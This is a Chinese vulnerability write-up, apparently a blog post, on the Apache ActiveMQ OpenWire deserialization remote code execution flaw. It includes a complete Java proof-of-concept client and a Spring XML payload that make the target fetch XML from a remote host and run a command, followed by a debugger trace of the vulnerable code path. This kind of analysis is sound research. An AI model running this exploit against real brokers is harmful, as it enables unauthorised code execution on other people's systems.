声明：该公众号分享的安全工具和项目均来源于网络，仅供安全研究与学习之用，如用于其他用途，由使用者承担全部法律及连带责任，与工具作者和本公众号无关

现在只对常读和星标的公众号才展示大图推送，建议大家把猫蛋儿安全“设为星标”，否则可能看不到了！

漏洞简介

ActiveMQ 是 Apache 出品的开源消息总线。ActiveMQ 是一个完全支持 JMS1.1 和 J2EE 1.4 规范的 JMS Provider 实现。上个月突然爆了这个漏洞，当时没有时间看，就一直拖着，最近有时间了就把分析过程梳理出来了，网上有很多师傅对这个漏洞做了很多分析了，本篇文章也是参考了其他师傅的思路分析的，分析过程中加入了一些框架的知识点，仅供大家学习。

环境部署

直接下载5.18.3版本以下的ActiveMQ，这个直接去官网下就行。然后配置java11的环境，运行bin目录下的activemq.bat就可以运行了。

运行成功后访问 http://172.20.10.9:8161/index.html。

复现过程

漏洞分析之前，我们先复现一遍这个漏洞，有些师傅可能只是需要学习打法，所以不要急，先走遍流程。

首先先将poc.xml部署在http服务上。

<?xml version="1.0" encoding="utf-8"?><beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">  <bean id="runtime" class="java.lang.Runtime" factory-method="getRuntime" />  <bean id="process" factory-bean="runtime" factory-method="exec">    <constructor-arg value="calc" />  </bean></beans>

接下来执行如下poc代码。

import org.apache.activemq.ActiveMQConnection;import org.apache.activemq.ActiveMQConnectionFactory;import org.apache.activemq.command.ExceptionResponse;import org.apache.activemq.transport.AbstractInactivityMonitor;import org.springframework.context.support.ClassPathXmlApplicationContext;import javax.jms.*;import java.io.*;import java.lang.reflect.Method;public class poc {    private static final String ACTIVEMQ_URL = "tcp://172.20.10.9:61616";    //定义发送消息的队列名称    private static final String QUEUE_NAME = "tempQueue";    public static void main(String[] args) throws Exception {        //创建连接工厂        ActiveMQConnectionFactory activeMQConnectionFactory = new ActiveMQConnectionFactory(ACTIVEMQ_URL);        //创建连接        Connection connection = activeMQConnectionFactory.createConnection();        //打开连接        connection.start();        Throwable obj2 = new ClassPathXmlApplicationContext("http://172.20.10.4/poc.xml");        ExceptionResponse exceptionResponse = new ExceptionResponse(obj2);        ((ActiveMQConnection)connection).getTransportChannel().oneway(exceptionResponse);        connection.close();    }}

成功命令执行。

复现成功后，我们开始本文的正题，我们开始从代码层面开始从头进行分析。

代码分析

一、寻找触发点

首先通过代码对照工具需要漏洞触发点位置。根据对于的代码定位到BaseDataStreamMarshaller这个类的位置，可以看到这里通过反射调用实例化了一个构造函数传参为String的类。并且可以看到5.18.3增加了过滤规则，所以我们跟进IDEA里面进行进一步分析。

进入5.18.3版本的代码查看过滤函数。这里对类进行了一次判断，确定传入类是不是继承来自于另一个父类Throwable，如果不是抛出异常。

二、触发点分析

我们通过对照函数找到了触发点，下一步我们将对触发函数进行进一步的分析首先找到触发点的位置。跟到BaseDataStreamMarshaller.createThrowable位置。

寻找createThrowable函数是什么位置进行触发。可以看到可以通过tightUnmarsalThrowable、looseUnmarsalThrowable两个方法进行触发。

我们了解到这里是通过传入的参数dataIn获取的传入的claszz和message。

回到刚才分析的位置，我们选择跟进其中一个looseUnmarsalThrowable进行分析，继续向上寻找looseUnmarsalThrowable的触发点。可以看到存在3个触发点，分别是ConnectionErrorMarshaller、ExceptionResponseMarshaller、MessageAckMarshaller。

我们选择跟进其中一个ExceptionResponseMarshaller进行分析，进入looseUnmarshal方法后，dataIn可控，从上层DataInput dataIn传入进来。另外我们通过层次结构分析可以看到方法上层通过OpenWireFormat进行调用，所以我们继续向上。

进入doUnmarshal，我们从头开始进行分析，传入DataInput dis后，会读取dis的readByte()，之后对其选择对应dataType的执行器，而我们从上面的分析可以得知我们需要触发ConnectionErrorMarshaller、ExceptionResponseMarshaller、MessageAckMarshaller这三个类的looseUnmarshal方法，可以看到ExceptionResponseMarshaller为31，ConnectionErrorMarshaller为16，MessageAckMarshaller为22。

我们上面拿的是ExceptionResponseMarshaller，所以我们的dataType为31，之后dsm创建了一个对应的类，也就是ExceptionResponse类。最后对应的执行器带着传入的参数dis和创建的类data执行looseUnmarshal向下。

这里我们可以得知DataInput dis需要是ExceptionResponse类dataType才可为31，才可以创建对应的执行器，也就是dsm才可为ExceptionResponseMarshaller。

从doUnmarshal方法看完之后我们继续向上我们跟到了unmarshal方法的位置。

通过分析和查询资料得知，不同协议的消息都会从此进行解析。我们可以写一个生产消费的demo去测试TCP协议的传输。然后我们继续向下跟进。

这里我们跟进到了TcpTransport类，readCommand()<—doRun()<—run()，这里其实关键的位置就是readCommand()方法，这里的wireFormat.unmarshal是对数据进行格式化，可以认为这是一个反序列化过程。这个Command也就是我们生成的类，所以我们的发送的消息数据也需要是序列化之后的数据。

到此我们的触发点分析也就结束了，现在我们就还需要解决两个问题。

1.如何将marshal后的ExceptionResponse类发送出去。2.寻找到一个构造函数为String类型的利用链。

三、ExceptionResponse类

问题1：如何将marshal后的ExceptionResponse类发送出去；

这个问题我们可以通过TcpTransport.oneway方法。这个oneway()方法里面传入的Object Command实际上就是我们正常发送消息使用的producer.send(ObjectMessage)里面的ObjectMessage。这里可以参考以下文章。https://www.cnblogs.com/mthoutai/p/6774920.htmlhttps://www.iteye.com/blog/donald-draper-2348440。另外关于readCommad()获取消息的过程可以参考下面的文章。https://my.oschina.net/u/4410490/blog/3583489

我们简单跟进一下生产者的send代码。

一路跟进：

producer.send(message);ActiveMQMessageProducerSupport.classActiveMQMessageProducer.classActiveMQSession.class—>this.connection.syncSendPacketActiveMQConnection.class—> this.transport.request(command)Transport.classResponseCorrelator.class—>this.asyncRequest(command, (ResponseCallback)null);—>this.next.oneway(command);Transport.classMutexTransport.class—> oneway(Object command)AbstractInactivityMonitor.class—> oneway(Object o)—> this.doOnewaySend(o)

AbstractInactivityMonitor完毕消息发送准备，随后就会调用TcpTransport。OpenWireFormat，DataOutputStream通过tcp发送消息。

总结一下消息发送流程：

1.发送消息入口2.调用ActiveMQMessageProducerSupport的send方法3.调用ActiveMQSession的send接口进行消息发送4.ActiveMQConnection发送消息5.ResponseCorrelator发送request6.调用MutexTransport来发送消息7.调用AbstractInactivityMonitor完毕消息发送准备8.调用TcpTransport、OpenWireFormat、DataOutputStream9.终于完毕通过tcp发送消息

所以我们只要通过oneway(Object o)的方法就相当于producer.send(message);直接发送消息，我们ExceptionResponse类传进去就相当于序列化发送了消息。所以这里我们只需要获取到当前ActiveMQConnection的Transport transport，就可以调用oneway()发送消息，代码如下。

//创建连接工厂ActiveMQConnectionFactory activeMQConnectionFactory = new ActiveMQConnectionFactory(ACTIVEMQ_URL);//创建连接Connection connection = activeMQConnectionFactory.createConnection();//打开连接connection.start();//获取oneway方法((ActiveMQConnection)connection).getTransportChannel().oneway(exceptionResponse);

四、ClassPathXmlApplicationContext类

问题2:寻找到一个构造函数为String类型的利用链;

这里其他师傅已经找到利用的点了，这里就简单弄一下。

ClassPathXmlApplicationContext类可以加载XML进行命令执行。

因为ActiveMQ自带spring相关依赖，所以可以直接利用这个方法。

因为这个漏洞触发可以看到都是需要是Throwable。所以我们只需要制作一个相同路径的ClassPathXmlApplicationContext类，触发之后系统将会寻找对应的ClassPathXmlApplicationContext类。

制作一个ClassPathXmlApplicationContext类。

按照ActiveMQ的发送消息demo写一个利用的POC。

import org.apache.activemq.ActiveMQConnection;import org.apache.activemq.ActiveMQConnectionFactory;import org.apache.activemq.command.ExceptionResponse;import org.apache.activemq.transport.AbstractInactivityMonitor;import org.springframework.context.support.ClassPathXmlApplicationContext;import javax.jms.*;import java.io.*;import java.lang.reflect.Method;public class poc {    private static final String ACTIVEMQ_URL = "tcp://172.20.10.9:61616";    //定义发送消息的队列名称    private static final String QUEUE_NAME = "tempQueue";    public static void main(String[] args) throws Exception {        //创建连接工厂        ActiveMQConnectionFactory activeMQConnectionFactory = new ActiveMQConnectionFactory(ACTIVEMQ_URL);        //创建连接        Connection connection = activeMQConnectionFactory.createConnection();        //打开连接        connection.start();        Throwable obj2 = new ClassPathXmlApplicationContext("http://172.20.10.4/poc.xml");        ExceptionResponse exceptionResponse = new ExceptionResponse(obj2);        ((ActiveMQConnection)connection).getTransportChannel().oneway(exceptionResponse);        connection.close();    }}0

简单跟进一下，就不深入分析了。

成功命令执行。

五、漏洞流程完整调试

首先我们的讲序列化好的数据进行发送。

import org.apache.activemq.ActiveMQConnection;import org.apache.activemq.ActiveMQConnectionFactory;import org.apache.activemq.command.ExceptionResponse;import org.apache.activemq.transport.AbstractInactivityMonitor;import org.springframework.context.support.ClassPathXmlApplicationContext;import javax.jms.*;import java.io.*;import java.lang.reflect.Method;public class poc {    private static final String ACTIVEMQ_URL = "tcp://172.20.10.9:61616";    //定义发送消息的队列名称    private static final String QUEUE_NAME = "tempQueue";    public static void main(String[] args) throws Exception {        //创建连接工厂        ActiveMQConnectionFactory activeMQConnectionFactory = new ActiveMQConnectionFactory(ACTIVEMQ_URL);        //创建连接        Connection connection = activeMQConnectionFactory.createConnection();        //打开连接        connection.start();        Throwable obj2 = new ClassPathXmlApplicationContext("http://172.20.10.4/poc.xml");        ExceptionResponse exceptionResponse = new ExceptionResponse(obj2);        ((ActiveMQConnection)connection).getTransportChannel().oneway(exceptionResponse);        connection.close();    }}1

这里将会走以下流程：

1.发送消息入口2.调用ActiveMQMessageProducerSupport的send方法3.调用ActiveMQSession的send接口进行消息发送4.ActiveMQConnection发送消息5.ResponseCorrelator发送request6.调用MutexTransport来发送消息7.调用AbstractInactivityMonitor完毕消息发送准备8.调用TcpTransport、OpenWireFormat、DataOutputStream9.终于完毕通过tcp发送消息

ActiveMQ将会监听TCP对应的61616端口。

对应的会传递到TcpTransport。

跳转到OpenWireFormat开始进行反序列化。

我们的类型为对应的31，之后会进入tightUnmarshal方法或者looseUnmarshal方法。（这里用looseUnmarshal方法举例）

跳转到对应的looseUnmarshal方法，之后进入looseUnmarsalThrowable方法。

进入looseUnmarsalThrowable方法，将获取clazz和message随后将其传入createThrowable。

进入createThrowable，反射调用传入clazz对应的构造函数然后进行实例化。

由于我们poc构造的clazz是ClassPathXmlApplicationContext类，所以对应跳转到该类。

将传入的位置传入对应的触发点。

成功利用~~，over ！！！

那个，你都看到这里了，还不点个关注吗~~